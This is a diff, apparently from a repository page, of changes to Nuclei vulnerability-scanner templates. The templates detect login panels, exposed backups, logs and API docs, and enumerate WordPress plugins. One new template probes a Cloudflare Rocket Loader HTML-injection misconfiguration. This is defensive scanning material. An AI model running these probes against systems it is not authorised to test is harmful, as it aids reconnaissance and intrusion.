||||
- 'PPSAUTH='
|
||||
# digest: 4a0a00473045022100da651ce3e96c872c09b0efeb7f24ce435691efb6047687fa2f980969c7d32add02206cedee1a6d93fb48ac0d8c6a50883823566a3fdc0b0946e3a3d17921b76ed292:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a1b58b379feb7b3d65301bdfd4395652cad8294c5edae415ecc4d47669e3ad1a02207e32ff2739b36c0e05a467df6fbef59f1ef6c6383b4ec9a75dbc21729f14efae:922c64590222798bb761d5b6d8e72950
|
|
@ -5,9 +5,9 @@ info:
|
|||
author: dadevel
|
||||
severity: info
|
||||
metadata:
|
||||
max-request: 2
|
||||
vendor: pulsesecure
|
||||
product: pulse_connect_secure
|
||||
max-request: 2
|
||||
tags: pulse,panel
|
||||
|
||||
http:
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- "(?i)<string>([^<]+)</string>"
|
||||
# digest: 4a0a0047304502203aa1cb77ba86704bad2c198c7fbf07c028f96dfe80cb8d6860fbec949ba9b314022100dbe4fbc3fd5b5fb9a25b9f45063a4c986bbe786b109f9356b2da46be1eb8b4af:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f823e5c127aced792ff96e8e9214476b414af4e1353f299d1e59d51b537e6fd3022100b1c6a628c41e09ad48d649a5dca0b9f6051955009d9de2338a4237d51322544b:922c64590222798bb761d5b6d8e72950
|
|
@ -9,7 +9,8 @@ info:
|
|||
- https://www.rocket.chat/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Rocket.Chat"
|
||||
shodan-query: "http.title:\"Rocket.Chat\""
|
||||
max-request: 1
|
||||
tags: panel,rocketchat,login,detect
|
||||
|
||||
http:
|
||||
|
@ -25,4 +26,4 @@ http:
|
|||
- 'status_code == 200'
|
||||
- 'contains_any(body, "<title>Rocket.Chat", "content=\"Rocket.Chat")'
|
||||
condition: and
|
||||
# digest: 490a00463044022012e5cbbf245707dd32c566958b4c6fa7a07f06f418139ec7a81026c1f90de09a0220096635ca065674713ac77f3b305157cbfba0635b3f6e7d7da94cf8ed3f1ac1e7:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220213f92e33c7b93bd760a281dff3427b796dcb4eed73ed550941fb16abddd89180220080a30ead625b8491cb47333aff0f5d45158897773064a2aeb1baddffe94683a:922c64590222798bb761d5b6d8e72950
|
|
@ -5,14 +5,15 @@ info:
|
|||
author: righettod
|
||||
severity: info
|
||||
description: |
|
||||
Sentry login panel was detected.
|
||||
Sentry login panel was detected.
|
||||
reference:
|
||||
- https://sentry.io/
|
||||
metadata:
|
||||
vendor: sentry
|
||||
product: sentry
|
||||
verified: true
|
||||
shodan-query: http.title:"Login | Sentry"
|
||||
shodan-query: "http.title:\"Login | Sentry\""
|
||||
max-request: 1
|
||||
tags: panel,sentry,login
|
||||
|
||||
http:
|
||||
|
@ -36,4 +37,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '(?i)"current":\s*"([0-9a-z.-]+)"'
|
||||
# digest: 4b0a00483046022100bc11bbc2da0eeaaeb02cfdf576e886aaad2dbc0fbf346c43f5d8242aafd24ac102210087c344fb3a27ea65932c1a1adbd8ede83fcc91914d7c39027ae096ec8cd72ac0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b04d058d31690931f321b078a2ac12a98dbfae03861caadbc878766143783e2902207291a26d57c10aaa7dfedba3b543e898aa150509733c646e144fcd58a5758175:922c64590222798bb761d5b6d8e72950
|
|
@ -9,10 +9,10 @@ info:
|
|||
reference:
|
||||
- https://www.truenas.com
|
||||
metadata:
|
||||
vendor: ixsystems
|
||||
product: truenas
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: ixsystems
|
||||
product: truenas
|
||||
shodan-query: html:"TrueNAS"
|
||||
tags: login,panel,truenas
|
||||
|
||||
|
@ -33,4 +33,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100dd1d5fd20c54a80d0f7d2631323b4434a2da43d683ca143da2f976cf8ab372d702201c583fae3cb0276990d9ad033e8461d795c1c7eba84d733b30cb0b2a45e60d26:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100ece185971ecd556127979d86bf7200c50f67dfaf61bb545570d1df063fd788a2022100ddaefbef6ccd73cfd9d33ba6612bfab01cd89d1c688769cc5159cfee1588d464:922c64590222798bb761d5b6d8e72950
|
|
@ -5,11 +5,12 @@ info:
|
|||
author: righettod
|
||||
severity: info
|
||||
description: |
|
||||
Vista Web login panel was detected.
|
||||
Vista Web login panel was detected.
|
||||
reference:
|
||||
- https://resa.aero/solutions-operations-facturation/vista-web/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: panel,vistaweb,login
|
||||
|
||||
http:
|
||||
|
@ -30,4 +31,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- 'v=([0-9.]+)'
|
||||
# digest: 4b0a004830460221009afbf2bd9a3f5bfffe7e6d92b5b3f4423102532bd1114541c5258759f24bc380022100e1677ad6b53c0e42ddb24ee59efd95a0682281006b56d46e0fb15a195598ffda:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100e75b80b7677ce3d46ea55b865e0c89ab12384a99ff0b565ec6e4dd49f1090a3102207c7e6629206f24058e677de683d5e3a191e9b14095a37db1469d6bfe1d00ac7b:922c64590222798bb761d5b6d8e72950
|
|
@ -10,9 +10,9 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 59
|
||||
shodan-query: "http.title:\"swagger\""
|
||||
verified: true
|
||||
max-request: 57
|
||||
shodan-query: http.title:"swagger"
|
||||
tags: exposure,api,swagger
|
||||
|
||||
http:
|
||||
|
@ -105,4 +105,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
|
||||
# digest: 4a0a00473045022100d3639a8b44e797aa3fc7cca0bb5778f14f0d9d59ab15483940be419fa21321fa02204cbbcd636969871ac6d8cea4cb7aada40b6938b1f3314f3c235d4a80a1550bbd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220699b1c75442a856dcd0637850a4464835dd00335e1ec2f4345bebd359e25f9af022100e79a9981d9c1330730d4f4b9fe6a2785c38be6e2ee9ad19f1df3d38694a5f97d:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,7 @@ info:
|
|||
cvss-score: 5.3
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 1440
|
||||
max-request: 1305
|
||||
tags: exposure,backup
|
||||
|
||||
http:
|
||||
|
@ -127,4 +127,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a004730450221009e9e29e2bc6fa477a5ef35e682ed0677d6cd6457e0516add7ba7b3657dea242c0220573cc11dd5d3c17b8bb3226a23ac6bfa501b1c7f5e337c1fdfe79e581abadeb9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950
|
|
@ -8,10 +8,9 @@ info:
|
|||
reference: https://www.awstats.org/docs/awstats_setup.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
max-request: 3
|
||||
max-request: 4
|
||||
tags: config,exposure,awstats
|
||||
|
||||
http:
|
||||
|
@ -36,4 +35,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100a1d5304bdbe5718f9bb640888a5db388a5558f54e61dd1b5154393c62febb940022100a7d26343bf553aacbf42a7d583dc4bb2d4222a7fe0d08eae43078c91e82029f2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220627e9e39ded451b53e2044aebb66514409fa81010ab0676b9ac36403755c30110221009aeb142c34946a6588ea2a98ebfece9603c77169ee688104cc8e6408be7b3c0d:922c64590222798bb761d5b6d8e72950
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
|
||||
metadata:
|
||||
max-request: 12
|
||||
max-request: 16
|
||||
tags: exposure,logs
|
||||
|
||||
http:
|
||||
|
@ -57,4 +57,4 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- content_length
|
||||
# digest: 4a0a0047304502210092febbf3f9906523788e68550f93dd10480ff15eb53ab20a8c452c482c7cd380022061f77b2b8a8ae9439fe60c5d02731b99246b700d7d38cac9608bced9885ba4a3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f29f0edc0fd1c21ddc672864cdd1b0e8f9b6bf2fd245e63e3a18e009f87dda4802210094fc7c7162920f3d1b9a810729c4ac860b27bb6b73a4fe837009758cf4ee4fae:922c64590222798bb761d5b6d8e72950
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: 0xcrypto
|
||||
severity: info
|
||||
metadata:
|
||||
max-request: 98135
|
||||
max-request: 100563
|
||||
tags: fuzzing,bruteforce,wordpress
|
||||
|
||||
http:
|
||||
|
@ -35,4 +35,4 @@ http:
|
|||
regex:
|
||||
- "===\\s(.*)\\s===" # extract the plugin name
|
||||
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
|
||||
# digest: 4b0a00483046022100bc606e0746f263229a02d000cd84aafb581fcdf5d93f151e4de17e328f47291b022100a600a40ce1fbd7cab94ccc994cd355edf9dc15ed337d21d28b414705b5324161:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,40 @@
|
|||
id: cloudflare-rocketloader-htmli
|
||||
|
||||
info:
|
||||
name: Cloudflare Rocket Loader - HTML Injection
|
||||
author: j3ssie
|
||||
severity: low
|
||||
description: |
|
||||
The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
|
||||
reference:
|
||||
- https://developers.cloudflare.com/speed/optimization/content/rocket-loader/enable/
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
tags: misconfig,cloudflare,htmli
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cdn-cgi/image/width=1000,format=auto/https://raw.githubusercontent.com/simple-icons/simple-icons/develop/icons/cloudflare.svg"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Cloudflare'
|
||||
- '<svg'
|
||||
- 'M16.5088 16.8447c.1475-.5068.0908-.9707-.1553-1.3154-.2246-.3164-.6045-.499-1.0615-.5205l-'
|
||||
- '1475.5068-.0918.9707.1543 1.3164.2256.3164.6055.498'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'image/svg+xml'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502203f1f9450ea215136ca621ee9dbedce3ae4455abcc8dd73db23c5e0cdde586076022100f02e51d462db656b75f00a878d4608aed164f4cc5492a86cb73fd88a1665a085:922c64590222798bb761d5b6d8e72950
|
|
@ -10,8 +10,9 @@ info:
|
|||
- https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43
|
||||
- https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication
|
||||
metadata:
|
||||
shodan-query: "Chromecast"
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: Chromecast
|
||||
tags: google,chromecast,detect
|
||||
|
||||
http:
|
||||
|
@ -32,4 +33,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a004730450221009d996dd528a6470315f3ef08c7de657ec6203185d235eb7877324aeb51c17c29022078f0723a1a04cc66cea30f0a15c736c5701e1062d0d40436d5f177e847865396:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,8 @@ info:
|
|||
- https://www.ibm.com/products/operational-decision-manager
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: icon_hash="707491698"
|
||||
fofa-query: "icon_hash=\"707491698\""
|
||||
max-request: 1
|
||||
tags: ibm,decision-center,tech,detect
|
||||
|
||||
http:
|
||||
|
@ -28,4 +29,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100a59aa313dd5de76ccd37ff23f84ea70c006cf6902d856db566f35dd35a4091250221008aa670d5443398d03af2bd250cf3d43d379ff8c32783e9f9de3bb9c7af63ad0e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220145ded2786c1d6f03455e511dd78e011fec59080659837fcc214ab4d5fa13b930220173f1a21d9016bd6415376e6b6963b1964e29cc705c87c6b10ee14d6f0eeb176:922c64590222798bb761d5b6d8e72950
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue